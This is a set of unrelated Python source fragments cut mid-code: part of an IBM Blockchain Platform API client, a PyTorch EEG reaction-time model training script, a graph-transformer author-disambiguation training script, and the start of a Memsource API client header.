**kwargs
) -> DetailedResponse:
"""
Generate Postman collection.
Generate and download a Postman API Collection. The JSON contains all the APIs
available in the IBP console. It can be imported to the
[Postman](https://www.postman.com/downloads) desktop application. **The examples
in the collection will be pre-populated with authorization credentials.** The
authorization credentials to use must be provided to this API. See the query
parameters for available options.
Choose an auth strategy that matches your environment & concerns:
- **IAM Bearer Auth** - *[Available on IBM Cloud]* - This is the recommended auth
strategy. The same bearer token used to authenticate this request will be copied
into the Postman collection examples. Since the bearer token expires the auth
embedded in the collection will also expire. At that point the collection might be
deleted & regenerated, or manually edited to refresh the authorization header
values. To use this strategy set `auth_type` to `bearer`.
- **IAM Api Key Auth** - *[Available on IBM Cloud]* - The IAM api key will be
copied into the Postman collection examples. This means the auth embedded in the
collection will never expire. To use this strategy set `auth_type` to `api_key`.
- **Basic Auth** - *[Available on OpenShift & IBM Cloud Private]* - A basic auth
username and password will be copied into the Postman collection examples. This is
**not** available for an IBP SaaS instance on IBM Cloud. To use this strategy set
`auth_type` to `basic`.
:param str auth_type: - **bearer** - IAM Bearer Auth - *[Available on IBM
Cloud]* - The same bearer token used to authenticate this request will be
copied into the Postman collection examples. The query parameter `token`
must also be set with your IAM bearer/access token value.
- **api_key** - IAM Api Key Auth - *[Available on IBM Cloud]* - The IAM api
key will be copied into the Postman collection examples. The query
parameter `api_key` must also be set with your IAM API Key value.
- **basic** - Basic Auth - *[Available on OpenShift & IBM Cloud Private]* -
A basic auth username and password will be copied into the Postman
collection examples. The query parameters `username` & `password` must also
be set with your IBP api key credentials. The IBP api key is the username
and the api secret is the password.
:param str token: (optional) The IAM access/bearer token to use for auth in
the collection.
:param str api_key: (optional) The IAM api key to use for auth in the
collection.
:param str username: (optional) The basic auth username to use for auth in
the collection.
:param str password: (optional) The basic auth password to use for auth in
the collection.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse
"""
if auth_type is None:
raise ValueError('auth_type must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V3',
operation_id='get_postman')
headers.update(sdk_headers)
params = {
'auth_type': auth_type,
'token': token,
'api_key': api_key,
'username': username,
'password': password
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
url = '/ak/api/v3/postman'
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request)
return response
def get_swagger(self,
**kwargs
) -> DetailedResponse:
"""
Download OpenAPI file.
Download the [OpenAPI](https://swagger.io/specification/) specification YAML file
(aka swagger file) for the IBP console. This is the same file that was used to
generate the APIs on this page. This file documents APIs offered by the IBP
console.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `str` result
"""
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V3',
operation_id='get_swagger')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'text/plain'
url = '/ak/api/v3/openapi'
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request)
return response
class GetComponentEnums:
"""
Enums for get_component parameters.
"""
class DeploymentAttrs(str, Enum):
"""
Set to 'included' if the response should include Kubernetes deployment attributes
such as 'resources', 'storage', 'zone', 'region', 'admin_certs', etc. Default
responses will not include these fields.
**This parameter will not work on *imported* components.**
It's recommended to use `cache=skip` as well if up-to-date deployment data is
needed.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class ParsedCerts(str, Enum):
"""
Set to 'included' if the response should include parsed PEM data along with base
64 encoded PEM string. Parsed certificate data will include fields such as the
serial number, issuer, expiration, subject, subject alt names, etc. Default
responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class CaAttrs(str, Enum):
"""
Set to 'included' if the response should fetch CA attributes, inspect
certificates, and append extra fields to CA and MSP component responses.
- CA components will have fields appended/updated with data fetched from the
`/cainfo?ca=ca` endpoint of a CA, such as: `ca_name`, `root_cert`,
`fabric_version`, `issuer_public_key` and `issued_known_msps`. The field
`issued_known_msps` indicates imported IBP MSPs that this CA has issued. Meaning
the MSP's root cert contains a signature that is derived from this CA's root cert.
Only imported MSPs are checked. Default responses will not include these fields.
- MSP components will have the field `issued_by_ca_id` appended. This field
indicates the id of an IBP console CA that issued this MSP. Meaning the MSP's root
cert contains a signature that is derived from this CA's root cert. Only
imported/created CAs are checked. Default responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class GetMspCertificateEnums:
"""
Enums for get_msp_certificate parameters.
"""
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class ListComponentsEnums:
"""
Enums for list_components parameters.
"""
class DeploymentAttrs(str, Enum):
"""
Set to 'included' if the response should include Kubernetes deployment attributes
such as 'resources', 'storage', 'zone', 'region', 'admin_certs', etc. Default
responses will not include these fields.
**This parameter will not work on *imported* components.**
It's recommended to use `cache=skip` as well if up-to-date deployment data is
needed.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class ParsedCerts(str, Enum):
"""
Set to 'included' if the response should include parsed PEM data along with base
64 encoded PEM string. Parsed certificate data will include fields such as the
serial number, issuer, expiration, subject, subject alt names, etc. Default
responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class CaAttrs(str, Enum):
"""
Set to 'included' if the response should fetch CA attributes, inspect
certificates, and append extra fields to CA and MSP component responses.
- CA components will have fields appended/updated with data fetched from the
`/cainfo?ca=ca` endpoint of a CA, such as: `ca_name`, `root_cert`,
`fabric_version`, `issuer_public_key` and `issued_known_msps`. The field
`issued_known_msps` indicates imported IBP MSPs that this CA has issued. Meaning
the MSP's root cert contains a signature that is derived from this CA's root cert.
Only imported MSPs are checked. Default responses will not include these fields.
- MSP components will have the field `issued_by_ca_id` appended. This field
indicates the id of an IBP | |
+ torch.sqrt(-2 * tt * torch.log(2 * torch.sqrt(2 * torch.tensor(np.pi) * tt) * err)) # bound
# ks = torch.max(ks, torch.square(tt) + 1) # ensure bouhndary conditions are met
# kk = torch.arange(-4, 6) # we set K to be 10
# try:
# k = torch.tile(kk, (t.shape[0], 1)).cuda()
# except IndexError:
# k = kk.cuda()
# tt_vec = torch.tile(tt, (1, 10))
# pp = torch.cumsum(20.5 * torch.exp(-((20.5 ** 2) / 2) / tt_vec), axis=1)
# pp = pp[:, -1] / torch.sqrt(2 * torch.tensor(np.pi) * torch.squeeze(tt) ** 3)
# pp = pp[:, None]
#
# p = torch.log(pp * torch.exp(-v * a * w - (v ** 2) * torch.tensor(t).cuda() / 2) / (a ** 2))
# return -(p.sum())
# # loss = torch.zeros(len(target),requires_grad=True).cuda()
# # #
# # for i in range(0,len(target)):
# # # loss[i] = - torch.tensor((wfpt_logp1(target[i], 1, bias[i], torch.abs(ndt[i]), drift[i], 1, eps = 1e-10))).cuda()
# # loss[i] = - torch.tensor((wfpt_logp1(target[i], 1, torch.abs(torch.tensor(-0.6)), torch.abs(torch.tensor(0.3)), drift[i], 1, eps = 1e-10))).cuda()
# # if torch.isinf(loss[i]):
# # loss[i] = - torch.log(torch.tensor(8.423e-40).cuda()) #to avoid having inf
# loss = -1 * (((-1/2) * torch.log(2*torch.tensor(pi))) - ((1/2) * torch.log(torch.tensor(1)**2)) -(1/(2*torch.tensor(1)**2))*(target - ndt)**2)
# # print('loss--------------': , loss )
# return torch.mean(loss)
############################# class for dataloaders ########################
# produce the dataset
class SubTrDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_train_sub.shape[0]
self.x_data = np.asarray(X_train_sub, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_train_sub.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_train_sub, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class ValDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_val.shape[0]
self.x_data = np.asarray(X_val, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_val.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_val, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class TrDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_train0.shape[0]
self.x_data = np.asarray(X_train0, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_train0.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_train0, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class TestDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_test.shape[0]
self.x_data = np.asarray(X_test, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_test.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_test, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
class ToTensor:
# Convert ndarrays to Tensors
def __call__(self, sample): # not it became a callable object
inputs, targets = sample
return torch.from_numpy(inputs), torch.from_numpy(targets)
def reset_weights(m):
'''
Try resetting model weights to avoid
weight leakage.
'''
for layer in m.children():
if hasattr(layer, 'reset_parameters'):
print(f'Reset trainable parameters of layer = {layer}')
layer.reset_parameters()
def initialize_weights(m):
if isinstance(m, nn.Conv2d):
nn.init.kaiming_uniform_(m.weight.data)
print('init xavier uniform %s' % m)
if m.bias is not None:
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight.data, 1)
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.Linear):
print('init xavier uniform %s' % m)
nn.init.kaiming_uniform_(m.weight.data)
nn.init.constant_(m.bias.data, 0)
# %%
############################################################################
################################# starts here ###############################
############################################################################
results = dict() # a results dictionary for storing all the data
subIDs, finalsubIDs = getIDs()
mylist = np.arange(0, len(finalsubIDs))
subj = loadmat('behavior2_task3')['uniquepart'][0].tolist()
############################################
############### set subject ######################
############################################
for s in range(36, 37):
# a results dictionary for storing all the data
subIDs, finalsubIDs = getIDs()
# for i in range(0,1):
torch.manual_seed(seednum)
np.random.seed(seednum)
random.seed(seednum)
# if int(finalsubIDs[s][1:4]) in subj:
# print('in-sample subject')
# else:
# print('no in-sample subject, skipping to the next one>>>')
# continue
# ddmparams = getddmparams(finalsubIDs[s])
ddmparams = loadmat('/home/jenny/pdmattention/sincnet/single_nocond_' + finalsubIDs[s] + '.mat')
alpha, ndt_mcmc, drift = ddmparams['alpha'][0][0][2][0][0],ddmparams['ndt'][0][0][2][0][0],ddmparams['delta'][0][0][2][0][0]
# alpha, ndt, drift = ddmparams
# alpha = 1.39681064
# ndt = 0.39675787
# drift = 0.89709653
# alpha = alpha *2
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
g = torch.Generator()
g.manual_seed(seednum)
subjectstart = mylist[s]
subjectend = subjectstart + 1
####################### define sub #########################################
datadict = loadsubjdict(finalsubIDs[subjectstart])
print(str(subjectstart) + '/' + 'subjectID: ' + finalsubIDs[subjectstart])
data, cond, _, condition, correct = getrtdata(datadict, timestart, timeend)
# response = loadinfo(finalsubIDs[subjectstart])
rtall = condition.copy()
correct = correct.astype('int')
if correctModel is True:
condition = (correct * 2 - 1) * condition
correctind = condition>0
newdata = reshapedata(data).astype('float32')
condition = condition[correctind]
newdata = newdata[correctind,:,:]
cond = cond[correctind]
# # # get rid of the rts that are lower than ndt
# newdata = newdata[rtall>ndt,:,:]
# cond = cond[rtall>ndt]
# correct = correct[rtall>ndt]
# rtall = rtall[rtall>ndt]
#
# condition = condition[condition>ndt]
# # get correct only trials
# newdata=newdata[correct==1,:,:]
# cond = cond[correct==1]
# rtall = rtall[correct==1]
# condition = condition[correct==1]
# X_train000, X_test000, y_train000, y_test000 = train_test_split(newdata, condition, test_size=0.2, random_state=42)
# ndt = np.percentile(y_train000,1)
X_train0, X_test, y_train0, y_test = train_test_split(newdata, condition, test_size=0.2, random_state=42)
ndt = np.min(np.abs(y_train0)) * 0.93
print('MCMC ndt: ', ndt_mcmc)
print('ndt: ', ndt)
X_train00, X_test0, y_train0_cond, y_test_cond = train_test_split(newdata, cond, test_size=0.2, random_state=42)
# ndtint_train = y_train0>ndt
# ndtint_test = y_test> ndt
# X_train0, X_test, y_train0, y_test = X_train0[ndtint_train,:,:], X_test[ndtint_test,:,:], y_train0[ndtint_train], y_test[ndtint_test]
# X_train00, X_test0, y_train0_cond, y_test_cond = X_train00[ndtint_train,:,:], X_test0[ndtint_test,:,:], y_train0_cond[ndtint_train], y_test_cond[ndtint_test]
#
# y_train0 = np.ones_like(y_train0) * drift
# print(X_train0[200, 50, 150])
# print(X_test[24, 50, 150])
train_set = TrDataset(transform=ToTensor())
train_loader = DataLoader(dataset=train_set,
batch_size=batch_size,
shuffle=True, # shuffle the data
num_workers=0, worker_init_fn=seed_worker,
generator=g)
test_set = TestDataset(transform=ToTensor())
test_loader = DataLoader(dataset=test_set,
batch_size=batch_size,
shuffle=False, # shuffle the data
num_workers=0, worker_init_fn=seed_worker,
generator=g)
# sample the data
data, target = next(iter(train_loader))
# plt.plot(data[10,:,:].T)
# plt.show()
data, target = next(iter(test_loader))
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#################################################################################
######################## creating pre training visulization #####################
#################################################################################
targetlist = []
predictedlist = []
plt.rcParams.update({'font.size': 17})
fig = plt.figure(figsize=(18, 9))
gs = GridSpec(2, 4, figure=fig)
ax0 = fig.add_subplot(gs[0, 0])
ax1 = fig.add_subplot(gs[0, 1])
ax2 = fig.add_subplot(gs[1, 0])
ax3 = fig.add_subplot(gs[1, 1])
ax4 = fig.add_subplot(gs[0, 2:])
ax5 = fig.add_subplot(gs[1, 2:])
gradlist = []
model_0 = Sinc_Conv2d_ddm_2param(dropout=dropout_rate).cuda()
model_0.eval()
criterion = nn.MSELoss()
n_total_steps = len(test_loader)
for i, (test_data, test_target) in enumerate(test_loader):
cond_target = y_test_cond[i*batch_size+test_target.shape[0]-test_target.shape[0]:i*batch_size+test_target.shape[0]]
# # test_data, test_target = next(iter(test_loader))
pred, pred_1 = model_0(test_data.cuda())
pred_copy = pred.detach().cpu()
pred.mean().backward()
gradients = model_0.get_activations_gradient_filter()
gradlist.append(gradients)
test_target = torch.squeeze((test_target))
if cond_target.shape[0]==1:
test_target= test_target.view(1, 1)
else:
test_target = test_target.view(test_target.shape[0], 1)
# test_loss = my_loss(test_target.cuda(), pred_copy.cuda(), ndt, alpha,alpha/2, err = 1e-29)
test_loss = my_loss(test_target.cuda(), pred_copy.cuda(), ndt, torch.mean(pred_1.detach().cuda(), axis=0).cuda())
r2 = r2_score(test_target.cpu().detach().numpy(), pred_copy.cpu().detach().numpy())
# print("validation accuracy: ", val_acc)
# print("validation loss: ", val_loss)
# valacc_batch.append(val_acc.cpu())
try:
targetlist += torch.squeeze(test_target).tolist()
predictedlist += torch.squeeze(-pred_copy).cpu().tolist()
except TypeError:
targetlist += [torch.squeeze(test_target).tolist()]
predictedlist += [torch.squeeze(-pred_copy).cpu().tolist()]
print(f'Testing Batch: {i}, Step [{i + 1}/{n_total_steps}], Loss: {test_loss.item():.4f}, R^2 : {r2}')
# if i % 1 == 0:
# plt.plot(test_target, label='target')
# plt.plot(test_output.cpu().detach().numpy(), label='predicted')
# ax0.scatter(test_target, pred_copy.cpu().detach().numpy(), color ='b')
targetlist = np.array(targetlist)
predictedlist = np.array(predictedlist)
# ax0.scatter(targetlist[y_test_cond==1], predictedlist[y_test_cond==1], color='green', marker = 'o', label = 'easy')
# ax0.scatter(targetlist[y_test_cond==2], predictedlist[y_test_cond==2], color='blue', marker = '*', label = 'median')
# ax0.scatter(targetlist[y_test_cond==3], predictedlist[y_test_cond==3], color='red', marker = '^', label = 'hard')
# ax0.legend()
# ax0.set_xlabel('actual RT')
# ax0.set_ylabel('predicted Drift')
ax1.hist(rtall * 1000, bins=12, color='green')
if timestart < 625:
ax1.axvspan(0, (timeend-625)*2, color='cornflowerblue', alpha=0.5)
else:
ax1.axvspan(0, trialdur, color='cornflowerblue', alpha=0.5)
# xt = ax0.get_xticks()
# xt= np.append(xt, trialdur)
# xtl = xt.tolist()
#
# xtl[-1] = [format(trialdur)]
ax1.set_xticks([trialdur])
ax1.set_xticklabels(['window length' + format(trialdur) + 'ms\n' + 'post-stimulus:' + format(2*(timeend-625)) + 'ms'])
if timestart < 625:
fractionrt = sum(rtall * 1000 < (timeend-625)*2) / len(rtall) * 100
else:
fractionrt = sum(rtall * 1000 < trialdur) / len(rtall) * 100
ax1.text(0, ax1.get_ylim()[1] / 3, '%.2f' % fractionrt + '% \nof all\n RTs')
ax1.set_title('Fraction of RT')
# fig.show()
try:
G = torch.abs(torch.cat((gradlist[0], gradlist[1]), axis=0))
except IndexError:
G = torch.abs((gradlist[0]))
g_ij = np.mean(G.cpu().numpy(), axis=(-2, -1))
g_j = np.mean(g_ij, axis=0)
g_scaled = g_j / np.max(g_j)
order = np.argsort(g_scaled)
# r2all = r2_score(targetlist, predictedlist)
# print('r2all', r2all)
# corr_log = scipy.stats.pearsonr(targetlist, predictedlist)
# print('model0 corr log ----: ', corr_log)
# corr_rho = scipy.stats.spearmanr(targetlist, predictedlist)
# targetlist = | |
import sys
from pyHGT.data import *
from pyHGT.model import *
from warnings import filterwarnings
filterwarnings("ignore")
import argparse
parser = argparse.ArgumentParser(description='Training GNN on Author Disambiguation task')
'''
Dataset arguments
'''
parser.add_argument('--data_dir', type=str, default='./dataset/oag_output',
help='The address of preprocessed graph.')
parser.add_argument('--model_dir', type=str, default='./model_save',
help='The address for storing the models and optimization results.')
parser.add_argument('--task_name', type=str, default='AD',
help='The name of the stored models and optimization results.')
parser.add_argument('--cuda', type=int, default=0,
help='Avaiable GPU ID')
parser.add_argument('--domain', type=str, default='_CS',
help='CS, Medicion or All: _CS or _Med or (empty)')
'''
Model arguments
'''
parser.add_argument('--conv_name', type=str, default='hgt',
choices=['hgt', 'gcn', 'gat', 'rgcn', 'han', 'hetgnn'],
help='The name of GNN filter. By default is Heterogeneous Graph Transformer (hgt)')
parser.add_argument('--n_hid', type=int, default=400,
help='Number of hidden dimension')
parser.add_argument('--n_heads', type=int, default=8,
help='Number of attention head')
parser.add_argument('--n_layers', type=int, default=3,
help='Number of GNN layers')
parser.add_argument('--dropout', type=int, default=0.2,
help='Dropout ratio')
parser.add_argument('--sample_depth', type=int, default=6,
help='How many numbers to sample the graph')
parser.add_argument('--sample_width', type=int, default=128,
help='How many `nodes to be sampled per layer per type')
'''
Optimization arguments
'''
parser.add_argument('--optimizer', type=str, default='adamw',
choices=['adamw', 'adam', 'sgd', 'adagrad'],
help='optimizer to use.')
parser.add_argument('--data_percentage', type=int, default=1.0,
help='Percentage of training and validation data to use')
parser.add_argument('--n_epoch', type=int, default=100,
help='Number of epoch to run')
parser.add_argument('--n_pool', type=int, default=4,
help='Number of process to sample subgraph')
parser.add_argument('--n_batch', type=int, default=32,
help='Number of batch (sampled graphs) for each epoch')
parser.add_argument('--repeat', type=int, default=2,
help='How many time to train over a singe batch (reuse data)')
parser.add_argument('--batch_size', type=int, default=256,
help='Number of output nodes for training')
parser.add_argument('--clip', type=int, default=0.25,
help='Gradient Norm Clipping')
args = parser.parse_args()
if args.cuda != -1:
device = torch.device("cuda:" + str(args.cuda))
else:
device = torch.device("cpu")
graph = renamed_load(open(args.data_dir + '/graph%s.pk' % args.domain, 'rb'))
train_range = {t: True for t in graph.times if t != None and t < 2015}
valid_range = {t: True for t in graph.times if t != None and t >= 2015 and t <= 2016}
test_range = {t: True for t in graph.times if t != None and t > 2016}
types = graph.get_types()
apd = graph.edge_list['author']['paper']['rev_AP_write_first']
first_author_dict = {i : True for i in apd if len(apd[i]) >= 2}
name_count = defaultdict(lambda: [])
for i, j in tqdm(graph.node_feature['author'].iterrows(), total = len(graph.node_feature['author'])):
if i in first_author_dict:
name_count[j['name']] += [i]
name_count = {name: name_count[name] for name in name_count if len(name_count[name]) >= 4}
cand_list = list(graph.edge_list['venue']['paper']['PV_Journal'].keys())
def mask_softmax(pred, size):
loss = 0
stx = 0
for l in size:
loss += torch.log_softmax(pred[stx: stx + l], dim=-1)[0] / np.log(l)
stx += l
return -loss
def author_disambiguation_sample(seed, pairs, time_range, batch_size):
'''
sub-graph sampling and label preparation for author disambiguation:
(1) Sample batch_size // 4 number of names
'''
np.random.seed(seed)
names = np.random.choice(list(pairs.keys()), batch_size // 4, replace = False)
'''
(2) Get all the papers written by these same-name authors, and then prepare the label
'''
author_dict = {}
author_info = []
paper_info = []
name_label = []
max_time = np.max(list(time_range.keys()))
for name in names:
author_list = name_count[name]
for a_id in author_list:
if a_id not in author_dict:
author_dict[a_id] = len(author_dict)
author_info += [[a_id, max_time]]
for p_id, author_id, _time in pairs[name]:
paper_info += [[p_id, _time]]
'''
For each paper, create a list: the first entry is the true author's id,
while the others are negative samples (id of authors with same name)
'''
name_label += [[author_dict[author_list[author_id]]] + \
[author_dict[a_id] for (x_id, a_id) in enumerate(author_list) if x_id != author_id]]
'''
(3) Based on the seed nodes, sample a subgraph with 'sampled_depth' and 'sampled_number'
'''
feature, times, edge_list, _, _ = sample_subgraph(graph, time_range, \
inp = {'paper': np.array(paper_info), 'author': np.array(author_info)}, \
sampled_depth = args.sample_depth, sampled_number = args.sample_width)
'''
(4) Mask out the edge between the output target nodes (paper) with output source nodes (author)
'''
masked_edge_list = []
for i in edge_list['paper']['author']['AP_write_first']:
if i[0] >= batch_size:
masked_edge_list += [i]
edge_list['paper']['author']['AP_write_first'] = masked_edge_list
masked_edge_list = []
for i in edge_list['author']['paper']['rev_AP_write_first']:
if i[1] >= batch_size:
masked_edge_list += [i]
edge_list['author']['paper']['rev_AP_write_first'] = masked_edge_list
'''
(5) Transform the subgraph into torch Tensor (edge_index is in format of pytorch_geometric)
'''
node_feature, node_type, edge_time, edge_index, edge_type, node_dict, edge_dict = \
to_torch(feature, times, edge_list, graph)
'''
(6) Prepare the labels for each output target node (paper), and their index in sampled graph.
(node_dict[type][0] stores the start index of a specific type of nodes)
'''
ylabel = {}
for x_id, author_ids in enumerate(name_label):
ylabel[x_id + node_dict['paper'][0]] = np.array(author_ids) + node_dict['author'][0]
return node_feature, node_type, edge_time, edge_index, edge_type, ylabel
def prepare_data(pool):
'''
Sampled and prepare training and validation data using multi-process parallization.
'''
jobs = []
for batch_id in np.arange(args.n_batch):
p = pool.apply_async(author_disambiguation_sample, args=(randint(), \
sel_train_pairs, train_range, args.batch_size))
jobs.append(p)
p = pool.apply_async(author_disambiguation_sample, args=(randint(), \
sel_valid_pairs, valid_range, args.batch_size))
jobs.append(p)
return jobs
train_pairs = {}
valid_pairs = {}
test_pairs = {}
'''
Prepare all the author with same name and their written papers.
'''
for name in name_count:
same_name_author_list = np.array(name_count[name])
for author_id, author in enumerate(same_name_author_list):
for p_id in graph.edge_list['author']['paper']['rev_AP_write_first'][author]:
_time = graph.edge_list['author']['paper']['rev_AP_write_first'][author][p_id]
if type(_time) != int:
continue
if _time in train_range:
if name not in train_pairs:
train_pairs[name] = []
train_pairs[name] += [[p_id, author_id, _time]]
elif _time in valid_range:
if name not in valid_pairs:
valid_pairs[name] = []
valid_pairs[name] += [[p_id, author_id, _time]]
else:
if name not in test_pairs:
test_pairs[name] = []
test_pairs[name] += [[p_id, author_id, _time]]
np.random.seed(43)
'''
Only train and valid with a certain percentage of data, if necessary.
'''
sel_train_pairs = {p : train_pairs[p] for p in np.random.choice(list(train_pairs.keys()), int(len(train_pairs) * args.data_percentage), replace = False)}
sel_valid_pairs = {p : valid_pairs[p] for p in np.random.choice(list(valid_pairs.keys()), int(len(valid_pairs) * args.data_percentage), replace = False)}
'''
Initialize GNN (model is specified by conv_name) and Classifier
'''
gnn = GNN(conv_name = args.conv_name, in_dim = len(graph.node_feature['paper']['emb'].values[0]) + 401, \
n_hid = args.n_hid, n_heads = args.n_heads, n_layers = args.n_layers, dropout = args.dropout,\
num_types = len(graph.get_types()), num_relations = len(graph.get_meta_graph()) + 1).to(device)
matcher = Matcher(args.n_hid).to(device)
model = nn.Sequential(gnn, matcher)
if args.optimizer == 'adamw':
optimizer = torch.optim.AdamW(model.parameters())
elif args.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters())
elif args.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), lr = 0.1)
elif args.optimizer == 'adagrad':
optimizer = torch.optim.Adagrad(model.parameters())
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 1000, eta_min=1e-6)
stats = []
res = []
best_val = 0
train_step = 1500
pool = mp.Pool(args.n_pool)
st = time.time()
jobs = prepare_data(pool)
for epoch in np.arange(args.n_epoch) + 1:
'''
Prepare Training and Validation Data
'''
train_data = [job.get() for job in jobs[:-1]]
valid_data = jobs[-1].get()
pool.close()
pool.join()
'''
After the data is collected, close the pool and then reopen it.
'''
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool)
et = time.time()
print('Data Preparation: %.1fs' % (et - st))
'''
Train (time < 2015)
'''
model.train()
train_losses = []
torch.cuda.empty_cache()
for _ in range(args.repeat):
for node_feature, node_type, edge_time, edge_index, edge_type, ylabel in train_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
author_key = []
paper_key = []
key_size = []
for paper_id in ylabel:
author_ids = ylabel[paper_id]
paper_key += [np.repeat(paper_id, len(author_ids))]
author_key += [author_ids]
key_size += [len(author_ids)]
paper_key = torch.LongTensor(np.concatenate(paper_key)).to(device)
author_key = torch.LongTensor(np.concatenate(author_key)).to(device)
train_paper_vecs = node_rep[paper_key]
train_author_vecs = node_rep[author_key]
res = matcher.forward(train_author_vecs, train_paper_vecs, pair=True)
loss = mask_softmax(res, key_size)
optimizer.zero_grad()
torch.cuda.empty_cache()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
optimizer.step()
train_losses += [loss.cpu().detach().tolist()]
train_step += 1
scheduler.step(train_step)
del res, loss
'''
Valid (2015 <= time <= 2016)
'''
model.eval()
with torch.no_grad():
node_feature, node_type, edge_time, edge_index, edge_type, ylabel = valid_data
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
author_key = []
paper_key = []
key_size = []
for paper_id in ylabel:
author_ids = ylabel[paper_id]
paper_key += [np.repeat(paper_id, len(author_ids))]
author_key += [author_ids]
key_size += [len(author_ids)]
paper_key = torch.LongTensor(np.concatenate(paper_key)).to(device)
author_key = torch.LongTensor(np.concatenate(author_key)).to(device)
valid_paper_vecs = node_rep[paper_key]
valid_author_vecs = node_rep[author_key]
res = matcher.forward(valid_author_vecs, valid_paper_vecs, pair=True)
loss = mask_softmax(res, key_size)
'''
Calculate Valid NDCG. Update the best model based on highest NDCG score.
'''
valid_res = []
ser = 0
for s in key_size:
p = res[ser: ser + s]
l = torch.zeros(s)
l[0] = 1
r = l[p.argsort(descending = True)]
valid_res += [r.cpu().detach().tolist()]
ser += s
valid_ndcg = np.average([ndcg_at_k(resi, len(resi)) for resi in valid_res])
valid_mrr = np.average(mean_reciprocal_rank(valid_res))
if valid_ndcg > best_val:
best_val = valid_ndcg
torch.save(model, os.path.join(args.model_dir, args.task_name + '_' + args.conv_name))
print('UPDATE!!!')
st = time.time()
print(("Epoch: %d (%.1fs) LR: %.5f Train Loss: %.2f Valid Loss: %.2f Valid NDCG: %.4f Valid MRR: %.4f") % \
(epoch, (st-et), optimizer.param_groups[0]['lr'], np.average(train_losses), \
loss.cpu().detach().tolist(), valid_ndcg, valid_mrr))
stats += [[np.average(train_losses), loss.cpu().detach().tolist()]]
del res, loss
del train_data, valid_data
'''
Evaluate the trained model via test set (time > 2016)
'''
best_model = torch.load(os.path.join(args.model_dir, args.task_name + '_' + args.conv_name))
best_model.eval()
gnn, matcher = best_model
with | |
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:<EMAIL>>). # noqa: E501
OpenAPI spec version: Latest
